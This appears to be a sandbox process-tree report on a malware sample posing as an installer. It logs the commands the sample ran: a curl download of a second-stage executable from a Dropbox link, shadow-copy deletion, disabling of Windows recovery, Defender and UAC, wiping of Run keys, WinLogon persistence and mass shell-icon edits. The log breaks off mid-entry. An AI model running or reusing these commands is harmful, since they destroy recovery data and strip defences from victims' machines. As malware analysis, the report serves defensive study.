C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9942.tmp\9943.tmp\9944.bat C:\ProgramData\Drivers\Start.exe"
4⤵
PID:2992

C:\ProgramData\Drivers\curl.exe
C:\ProgramData\Drivers\Curl.exe -L -o "C:\ProgramData\Drivers\Driver.exe" "https://www.dropbox.com/s/kws6z5mk9d0t52b/HD0Killer0Clown02.6.exe?dl=1"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3592

C:\Users\Admin\Downloads\3MB Online Install.exe
"C:\Users\Admin\Downloads\3MB Online Install.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5532

C:\ProgramData\Drivers\Start.exe
"C:\ProgramData\Drivers\Start.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5588

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9F4D.tmp\9F4E.tmp\9F8E.bat C:\ProgramData\Drivers\Start.exe"
4⤵
PID:4172

C:\ProgramData\Drivers\curl.exe
C:\ProgramData\Drivers\Curl.exe -L -o "C:\ProgramData\Drivers\Driver.exe" "https://www.dropbox.com/s/kws6z5mk9d0t52b/HD0Killer0Clown02.6.exe?dl=1"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1048 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6084

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2908

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3116

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5872

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\3MB Online Install.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4268

C:\Users\Admin\Downloads\3MB Online Install.exe
"C:\Users\Admin\Downloads\3MB Online Install.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5680

C:\ProgramData\Drivers\Start.exe
"C:\ProgramData\Drivers\Start.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:544

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\126A.tmp\126B.tmp\126C.bat C:\ProgramData\Drivers\Start.exe"
3⤵
PID:2248

C:\ProgramData\Drivers\curl.exe
C:\ProgramData\Drivers\Curl.exe -L -o "C:\ProgramData\Drivers\Driver.exe" "https://www.dropbox.com/s/kws6z5mk9d0t52b/HD0Killer0Clown02.6.exe?dl=1"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1196

C:\ProgramData\Drivers\Driver.exe
"C:\ProgramData\Drivers\Driver.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5984

C:\java\protection\clown.exe
"C:\java\protection\clown.exe"
5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1308

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7191.tmp\7192.tmp\7193.bat C:\java\protection\clown.exe"
6⤵
PID:3284

C:\java\protection\start\startban.exe
C:\java\protection\start\startban.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6012

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\72CB.tmp\72CB.tmp\72CC.bat C:\java\protection\start\startban.exe"
8⤵
PID:3976

C:\java\ban\ban.exe
C:\java\ban\ban.exe
9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4536

C:\java\ban\ban.exe
C:\java\ban\ban.exe
10⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3612

C:\java\protection\def.exe
C:\java\protection\def.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\72BA.tmp\72BB.tmp\72BC.bat C:\java\protection\def.exe"
8⤵
PID:5024

C:\java\protection\DisDef.exe
C:\java\protection\DisDef.exe /D
9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1592

C:\java\protection\start\startcur.exe
C:\java\protection\start\startcur.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5356

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\72BB.tmp\72BB.tmp\72BC.bat C:\java\protection\start\startcur.exe"
8⤵
PID:3996

C:\java\ban\cur.exe
C:\java\ban\cur.exe
9⤵
- Executes dropped EXE
PID:5540

C:\java\protection\start\startkey.exe
C:\java\protection\start\startkey.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5352

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\72CA.tmp\72CB.tmp\72CC.bat C:\java\protection\start\startkey.exe"
8⤵
PID:1524

C:\java\ban\key.exe
C:\java\ban\key.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1908

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7421.tmp\7422.tmp\7423.bat C:\java\ban\key.exe"
10⤵
PID:6024

C:\Windows\system32\reg.exe
reg import C:\java\ban\key.reg
11⤵
PID:5132

C:\Windows\system32\ReAgentc.exe
reagentc /disable
7⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:2944

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete /nointeractive
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:6060

C:\java\zip\7z.exe
C:\java\zip\7z.exe a -tzip -mx1 -r0 C:\ProgramData\WindowsVersion\archive.zip C:\java
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:740

C:\java\protection\start\startdelstartup.exe
C:\java\protection\start\startdelstartup.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5884

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8170.tmp\8171.tmp\8172.bat C:\java\protection\start\startdelstartup.exe"
8⤵
PID:560

C:\java\protection\delstartup.exe
C:\java\protection\delstartup.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3180

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8317.tmp\8317.tmp\8318.bat C:\java\protection\delstartup.exe"
10⤵
PID:536

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /va /f
11⤵
PID:5704

C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /va /f
11⤵
PID:872

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" /va /f
11⤵
PID:5420

C:\java\protection\start\startuac.exe
C:\java\protection\start\startuac.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:844

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8160.tmp\8161.tmp\8172.bat C:\java\protection\start\startuac.exe"
8⤵
PID:4172

C:\java\protection\uac.exe
C:\java\protection\uac.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5996

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8316.tmp\8317.tmp\8318.bat C:\java\protection\uac.exe"
10⤵
PID:1836

C:\Windows\system32\reg.exe
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
11⤵
- UAC bypass
- Modifies registry key
PID:5768

C:\java\protection\start\startauto.exe
C:\java\protection\start\startauto.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5440

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8171.tmp\8171.tmp\8172.bat C:\java\protection\start\startauto.exe"
8⤵
PID:5072

C:\java\protection\auto.exe
C:\java\protection\auto.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3996

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8318.tmp\8317.tmp\8318.bat C:\java\protection\auto.exe"
10⤵
- Drops startup file
PID:5992

C:\java\protection\start\startWinlog.exe
C:\java\protection\start\startWinlog.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5088

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\819F.tmp\81A0.tmp\81A1.bat C:\java\protection\start\startWinlog.exe"
8⤵
PID:3384

C:\java\protection\Winlog.exe
C:\java\protection\Winlog.exe
9⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
PID:5368

C:\java\protection\start\startExplorerIcons.exe
C:\java\protection\start\startExplorerIcons.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5964

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\81A0.tmp\81A0.tmp\81A1.bat C:\java\protection\start\startExplorerIcons.exe"
8⤵
PID:5956

C:\java\protection\ExplorerIcons.exe
C:\java\protection\ExplorerIcons.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3140

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\83A2.tmp\83A3.tmp\83A4.bat C:\java\protection\ExplorerIcons.exe"
10⤵
PID:1956

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 1 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5756

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 2 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:1876

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 3 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5756

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 4 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5044

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 5 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:844

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 6 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5604

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 7 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:6112

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 8 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:3224

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 9 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5996

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 10 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4760

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 11 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:1592

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 12 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5400

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 13 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5056

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 14 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4568

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 15 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:404

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 16 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5476

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 17 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:280

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 18 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:2372

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 19 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:3104

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 20 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:1876

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 21 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:6080

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 22 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5528

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 23 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5932

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 24 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:1612

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 25 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5724

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 26 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:2248

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 27 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:308

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 28 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:1920

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 29 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies Shortcut Icons
PID:5704

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 30 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5672

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 31 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:4400

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 32 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5860

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 33 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:3068

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 34 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5740

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 35 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:2112

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 36 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:596

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 37 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:3200

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 38 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4852

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 39 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:1728

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 40 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4280

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 41 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:1532

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 42 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4184

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 43 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:3948

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 44 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:6028

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 45 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:1308

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 46 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:1496

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 47 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4612

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 48 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:4684

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 49 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5888

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 50 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:1756

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 51 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:1916

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 52 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:2904

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 53 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:1044

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 54 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4568

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 55 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:3240

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 56 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:4400

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 57 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5860

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 58 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:3576

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 59 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:3068

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 60 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5740

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 61 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:2112

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 62 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5424

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 63 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:1932

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 64 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5428

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 65 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:392

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 66 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4664

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 67 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:472

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 68 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:2728

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 69 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:648

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 70 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:4280

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 71 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5576

C:\Windows\system32\reg.exe
